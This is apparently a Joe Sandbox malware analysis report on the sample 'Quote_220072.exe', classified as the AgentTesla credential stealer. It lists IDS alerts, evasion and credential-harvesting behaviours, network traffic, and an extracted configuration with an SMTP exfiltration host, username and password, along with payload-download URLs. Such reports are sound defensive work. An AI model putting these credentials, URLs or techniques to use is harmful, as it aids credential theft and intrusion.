Edit tour

Windows Analysis Report
Quote_220072.exe

Overview

General Information

Sample name:	Quote_220072.exe
Analysis ID:	1546663
MD5:	ac900546c8bf5b3be3184502d0d2d7ba
SHA1:	6427b2e160082bdb6a5b0213a3de348986f31530
SHA256:	23df64fa762b5942d08dc6bf6f5afc75fc932519a96070af492e237b5483747f
Tags:	exeuser-threatcat_ch
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

AI detected suspicious sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Quote_220072.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\Quote_220072.exe" MD5: AC900546C8BF5B3BE3184502D0D2D7BA)

Quote_220072.exe (PID: 7888 cmdline: "C:\Users\user\Desktop\Quote_220072.exe" MD5: AC900546C8BF5B3BE3184502D0D2D7BA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Quote_220072.exe PID: 7888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Quote_220072.exe PID: 7888	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Signatures

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 199.79.62.115, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quote_220072.exe, Initiated: true, ProcessId: 7888, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49740

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T12:15:13.891888+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.9	49735	TCP
2024-11-01T12:15:52.715680+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.9	49741	TCP

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T12:14:50.254129+0100	2030171	1	A Network Trojan was detected	192.168.2.9	49740	199.79.62.115	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T12:15:46.463898+0100	2855542	1	A Network Trojan was detected	192.168.2.9	49740	199.79.62.115	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T12:15:46.463898+0100	2855245	1	A Network Trojan was detected	192.168.2.9	49740	199.79.62.115	587	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T12:15:39.027883+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49738	172.217.18.14	443	TCP

ETPRO MALWARE Win32/Agent Tesla SMTP Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T12:14:50.254129+0100	2839723	1	Malware Command and Control Activity Detected	192.168.2.9	49740	199.79.62.115	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T12:14:50.254129+0100	2840032	1	A Network Trojan was detected	192.168.2.9	49740	199.79.62.115	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Quote_220072.exe.7384.0.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}

Multi AV Scanner detection for submitted file

Source: Quote_220072.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Quote_220072.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.9:49739 version: TLS 1.2

Source: Quote_220072.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.9:49740 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49740 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.9:49740 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.9:49740 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.9:49740 -> 199.79.62.115:587

Source: global traffic

TCP traffic: 192.168.2.9:49740 -> 199.79.62.115:587

Source: Joe Sandbox View

IP Address: 199.79.62.115 199.79.62.115

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49741
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49738 -> 172.217.18.14:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49735

Source: global traffic

TCP traffic: 192.168.2.9:49740 -> 199.79.62.115:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: mail.mbarieservicesltd.com

Source: Quote_220072.exe, 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.mbarieservicesltd.com
Source: Quote_220072.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Quote_220072.exe, 00000005.00000002.2567555318.0000000004338000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Quote_220072.exe, 00000005.00000002.2567555318.0000000004374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R
Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775266109.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000438D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1746407195.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download
Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download%=
Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download7
Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=downloadQ
Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=downloady
Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/t
Source: Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/y
Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.9:49739 version: TLS 1.2

Source: C:\Users\user\Desktop\Quote_220072.exe

Code function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004036DA

Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 0_2_6FF82351	0_2_6FF82351
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_348813B8	5_2_348813B8
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_34884140	5_2_34884140
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_34884D58	5_2_34884D58
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_34884488	5_2_34884488
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377EDE38	5_2_377EDE38
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377E45A8	5_2_377E45A8
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377E8BE8	5_2_377E8BE8
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377EF210	5_2_377EF210
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377E4FA0	5_2_377E4FA0
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377E8330	5_2_377E8330
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377E7BA8	5_2_377E7BA8
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_37916400	5_2_37916400
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_37919C30	5_2_37919C30
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_37913570	5_2_37913570
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_3791B3B2	5_2_3791B3B2
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_37933608	5_2_37933608
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_379319A0	5_2_379319A0

Source: Quote_220072.exe

Static PE information: invalid certificate

Source: Quote_220072.exe, 00000005.00000002.2585542298.00000000346B9000.00000004.00000010.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Quote_220072.exe

Source: Quote_220072.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/12@3/3

Source: C:\Users\user\Desktop\Quote_220072.exe

0_2_004036DA

Source: C:\Users\user\Desktop\Quote_220072.exe

File created: C:\Users\user\overlays

Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Quote_220072.exe

File created: C:\Users\user\AppData\Local\Temp\nsb671F.tmp

Jump to behavior

Source: Quote_220072.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quote_220072.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quote_220072.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quote_220072.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quote_220072.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\Quote_220072.exe

File read: C:\Users\user\Desktop\Quote_220072.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quote_220072.exe "C:\Users\user\Desktop\Quote_220072.exe"
Source: C:\Users\user\Desktop\Quote_220072.exe	Process created: C:\Users\user\Desktop\Quote_220072.exe "C:\Users\user\Desktop\Quote_220072.exe"
Source: C:\Users\user\Desktop\Quote_220072.exe	Process created: C:\Users\user\Desktop\Quote_220072.exe "C:\Users\user\Desktop\Quote_220072.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

File written: C:\Users\user\Music\antithetic.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Quote_220072.exe

Static file information: File size 1197664 > 1048576

Source: Quote_220072.exe

